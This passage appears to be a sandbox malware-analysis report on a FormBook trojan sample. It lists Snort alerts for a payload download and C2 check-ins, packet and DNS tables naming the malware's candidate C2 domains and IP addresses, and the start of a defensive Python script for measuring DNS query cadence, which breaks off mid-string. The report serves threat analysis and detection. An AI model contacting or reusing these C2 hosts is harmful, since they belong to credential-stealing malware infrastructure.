                                                LegalCopyright | Internal Verify Number,88
                                                InternalName | Stoveddrif
                                                FileVersion | 1.00
                                                CompanyName | Internal Verify Number,88
                                                LegalTrademarks | Internal Verify Number,88
                                                ProductName | ANTERIADGRIZZ
                                                ProductVersion | 1.00
                                                OriginalFilename | Stoveddrif.exe

                                                Possible Origin

                                                Language of compilation system | Country where language is spoken
                                                Chinese | China

                                                Network Behavior

                                                Snort IDS Alerts

                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                02/25/21-15:34:16.437721 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49716 | 80 | 192.168.2.5 | 45.153.203.33
                                                02/25/21-15:34:59.716490 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49721 | 23.227.38.74 | 192.168.2.5
                                                02/25/21-15:35:04.845968 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
                                                02/25/21-15:35:04.845968 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
                                                02/25/21-15:35:04.845968 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49727 | 80 | 192.168.2.5 | 34.102.136.180
                                                02/25/21-15:35:04.985802 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 34.102.136.180 | 192.168.2.5
                                                02/25/21-15:35:40.123188 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8
                                                02/25/21-15:35:41.133951 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.5 | 8.8.8.8

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:34:16.374516964 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.436796904 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.436944962 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.437721014 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496598005 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496635914 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496656895 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496682882 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496690989 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496706009 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496721983 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496727943 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496752024 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496774912 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496777058 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496798038 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496805906 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496819973 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.496850014 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.496882915 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.552798986 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552834988 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552855968 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552880049 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552896976 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.552903891 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552927971 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552930117 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.552949905 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552973986 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.552982092 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.552997112 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553010941 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553019047 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553040028 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553060055 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553078890 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553090096 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553102970 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553114891 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553126097 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553150892 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553150892 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553174973 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553178072 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553200960 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553211927 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553224087 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553255081 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553303957 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553766966 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553790092 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.553852081 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.553875923 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.608613968 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608660936 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608685970 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608709097 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608732939 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608740091 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.608757019 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608778954 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608799934 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608803988 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.608824015 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608850956 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608874083 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608882904 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.608896971 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608913898 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.608923912 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608949900 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608968019 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608983040 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.608999014 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609016895 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609028101 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609044075 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609066963 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609091043 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609117031 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609138966 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609163046 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609183073 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609195948 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609220028 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609230995 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609244108 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609266996 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609278917 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609289885 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609313965 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609323978 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609338045 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609360933 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609400988 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609406948 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609431982 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5
Feb 25, 2021 15:34:16.609442949 CET | 49716 | 80 | 192.168.2.5 | 45.153.203.33
Feb 25, 2021 15:34:16.609456062 CET | 80 | 49716 | 45.153.203.33 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:33:46.760808945 CET | 54302 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:46.809546947 CET | 53 | 54302 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:46.944928885 CET | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:46.993603945 CET | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:47.278341055 CET | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:47.329859018 CET | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:47.430898905 CET | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:47.480560064 CET | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:48.598409891 CET | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:48.647420883 CET | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:49.453242064 CET | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:49.501979113 CET | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:50.042534113 CET | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:50.111465931 CET | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:50.840801954 CET | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:50.889533997 CET | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:51.791261911 CET | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:51.839999914 CET | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:53.128864050 CET | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:53.179744959 CET | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:54.904480934 CET | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:54.956171989 CET | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:33:59.180936098 CET | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:33:59.238554955 CET | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:00.270656109 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:00.319485903 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:02.033029079 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:02.081828117 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:03.337635994 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:03.386605978 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:05.278891087 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:05.327903986 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:15.828790903 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:15.888827085 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:26.380974054 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:26.430370092 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:41.504708052 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:41.564961910 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:41.824915886 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:41.873536110 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:34:59.387612104 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:34:59.467755079 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:00.532416105 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:00.590795040 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:04.727324963 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:04.803482056 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:10.006350040 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:10.165909052 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:15.455497026 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:15.520267010 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:20.651760101 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:20.721322060 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:25.823204994 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:25.916791916 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:30.873569012 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:30.922476053 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:31.067783117 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:31.290615082 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:37.013619900 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:38.006710052 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:39.022430897 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:39.119537115 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:40.121794939 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:41.133748055 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:44.136579037 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:44.193861961 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:49.397527933 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:49.461996078 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:51.366041899 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:51.446662903 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:52.313885927 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:52.377159119 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:52.943109989 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:53.003117085 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:53.415678978 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:53.488059044 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:53.489516973 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:53.592928886 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:54.130358934 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:54.190591097 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:54.873523951 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:54.954210043 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:55.668181896 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:55.725471020 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:56.585637093 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:56.645855904 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:57.545361996 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:57.597060919 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:35:58.037137985 CET | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:35:58.094475031 CET | 53 | 56895 | 8.8.8.8 | 192.168.2.5
Feb 25, 2021 15:36:11.851654053 CET | 62372 | 53 | 192.168.2.5 | 8.8.8.8
Feb 25, 2021 15:36:11.925832987 CET | 53 | 62372 | 8.8.8.8 | 192.168.2.5

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Feb 25, 2021 15:35:40.123188019 CET | 192.168.2.5 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable
Feb 25, 2021 15:35:41.133950949 CET | 192.168.2.5 | 8.8.8.8 | cfff | (Port unreachable) | Destination Unreachable

Note: both messages are the sandbox host rejecting late DNS replies, not C2 traffic. The query for www.scriptureonhealing.com (transaction 0x64e) was retried three times from UDP port 63732 at 15:35:37, :38 and :39; the resolver's three SERVFAIL answers arrived at 15:35:39, :40 and :41, and by the time the last two came in the client had stopped listening on that port, which is what triggered the two Snort SID 402 alerts above.

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 15:34:59.387612104 CET | 192.168.2.5 | 8.8.8.8 | 0x2dd7 | Standard query (0) | www.buytgp.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:04.727324963 CET | 192.168.2.5 | 8.8.8.8 | 0x3337 | Standard query (0) | www.delmarranch.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:10.006350040 CET | 192.168.2.5 | 8.8.8.8 | 0x4175 | Standard query (0) | www.youridealworld.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:15.455497026 CET | 192.168.2.5 | 8.8.8.8 | 0x8107 | Standard query (0) | www.apkiinsurance.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:20.651760101 CET | 192.168.2.5 | 8.8.8.8 | 0x1b27 | Standard query (0) | www.bestcroissantinlondon.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:25.823204994 CET | 192.168.2.5 | 8.8.8.8 | 0x33fe | Standard query (0) | www.thakehamwesthorsley.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:31.067783117 CET | 192.168.2.5 | 8.8.8.8 | 0xcd6c | Standard query (0) | www.guillemaudexcellenceauto.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:37.013619900 CET | 192.168.2.5 | 8.8.8.8 | 0x64e | Standard query (0) | www.scriptureonhealing.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:38.006710052 CET | 192.168.2.5 | 8.8.8.8 | 0x64e | Standard query (0) | www.scriptureonhealing.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:39.022430897 CET | 192.168.2.5 | 8.8.8.8 | 0x64e | Standard query (0) | www.scriptureonhealing.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:44.136579037 CET | 192.168.2.5 | 8.8.8.8 | 0xeb17 | Standard query (0) | www.karatetheokinawaway.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:49.397527933 CET | 192.168.2.5 | 8.8.8.8 | 0x5be2 | Standard query (0) | www.qionglaizhan.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:36:11.851654053 CET | 192.168.2.5 | 8.8.8.8 | 0x1886 | Standard query (0) | www.qionglaizhan.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 15:34:59.467755079 CET | 8.8.8.8 | 192.168.2.5 | 0x2dd7 | No error (0) | www.buytgp.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:34:59.467755079 CET | 8.8.8.8 | 192.168.2.5 | 0x2dd7 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:04.803482056 CET | 8.8.8.8 | 192.168.2.5 | 0x3337 | No error (0) | www.delmarranch.com | delmarranch.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:35:04.803482056 CET | 8.8.8.8 | 192.168.2.5 | 0x3337 | No error (0) | delmarranch.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:10.165909052 CET | 8.8.8.8 | 192.168.2.5 | 0x4175 | No error (0) | www.youridealworld.com | ghs.google.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:35:15.520267010 CET | 8.8.8.8 | 192.168.2.5 | 0x8107 | No error (0) | www.apkiinsurance.com | - | 104.21.56.93 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:15.520267010 CET | 8.8.8.8 | 192.168.2.5 | 0x8107 | No error (0) | www.apkiinsurance.com | - | 172.67.183.186 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:20.721322060 CET | 8.8.8.8 | 192.168.2.5 | 0x1b27 | No error (0) | www.bestcroissantinlondon.com | bestcroissantinlondon.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:35:20.721322060 CET | 8.8.8.8 | 192.168.2.5 | 0x1b27 | No error (0) | bestcroissantinlondon.com | - | 192.0.78.25 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:20.721322060 CET | 8.8.8.8 | 192.168.2.5 | 0x1b27 | No error (0) | bestcroissantinlondon.com | - | 192.0.78.24 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:25.916791916 CET | 8.8.8.8 | 192.168.2.5 | 0x33fe | No error (0) | www.thakehamwesthorsley.com | - | 94.136.40.51 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:31.290615082 CET | 8.8.8.8 | 192.168.2.5 | 0xcd6c | No error (0) | www.guillemaudexcellenceauto.com | - | 146.148.189.216 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:39.119537115 CET | 8.8.8.8 | 192.168.2.5 | 0x64e | Server failure (2) | www.scriptureonhealing.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:40.121794939 CET | 8.8.8.8 | 192.168.2.5 | 0x64e | Server failure (2) | www.scriptureonhealing.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:41.133748055 CET | 8.8.8.8 | 192.168.2.5 | 0x64e | Server failure (2) | www.scriptureonhealing.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:44.193861961 CET | 8.8.8.8 | 192.168.2.5 | 0xeb17 | No error (0) | www.karatetheokinawaway.com | - | 94.136.40.51 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:35:49.461996078 CET | 8.8.8.8 | 192.168.2.5 | 0x5be2 | No error (0) | www.qionglaizhan.com | - | 47.110.53.154 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:36:11.925832987 CET | 8.8.8.8 | 192.168.2.5 | 0x1886 | No error (0) | www.qionglaizhan.com | - | 47.110.53.154 | A (IP address) | IN (0x0001)
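The ten distinct hostnames queried above appear one after another, roughly five seconds apart, and only one of them (www.delmarranch.com) drew the FormBook check-in signatures. That is the shape of FormBook walking through its embedded list of candidate C2 names, most of which are decoys or unrelated sites. The script below is an added example, not part of the Joe Sandbox report: it parses the 13 query rows exactly as they appear on this page (the HTML table lost its column boundaries, so the two IP columns are fused), recovers the fused addresses, and measures the cadence at which new names are resolved. The VM and resolver addresses come from the report; the thresholds in rotation_profile (at least five names, median gap between 3 and 10 s) are illustrative assumptions, not tuned detection values.

```python
"""Cadence analysis of the DNS queries in this report (added example)."""
import ipaddress
import re
import statistics
from collections import Counter, namedtuple
from datetime import datetime, timezone

# The 13 rows of the report's "DNS Queries" table, copied verbatim.
REPORT_DNS_QUERIES = """\
Feb 25, 2021 15:34:59.387612104 CET192.168.2.58.8.8.80x2dd7Standard query (0)www.buytgp.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:04.727324963 CET192.168.2.58.8.8.80x3337Standard query (0)www.delmarranch.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:10.006350040 CET192.168.2.58.8.8.80x4175Standard query (0)www.youridealworld.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:15.455497026 CET192.168.2.58.8.8.80x8107Standard query (0)www.apkiinsurance.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:20.651760101 CET192.168.2.58.8.8.80x1b27Standard query (0)www.bestcroissantinlondon.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:25.823204994 CET192.168.2.58.8.8.80x33feStandard query (0)www.thakehamwesthorsley.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:31.067783117 CET192.168.2.58.8.8.80xcd6cStandard query (0)www.guillemaudexcellenceauto.comA (IP address)IN (0x0001)
Feb 25, 2021 15:35:37.013619900 CET192.168.2.58.8.8.80x64eStandard query (0)www.scriptureonhealing.comA (IP address)IN (0x0001)
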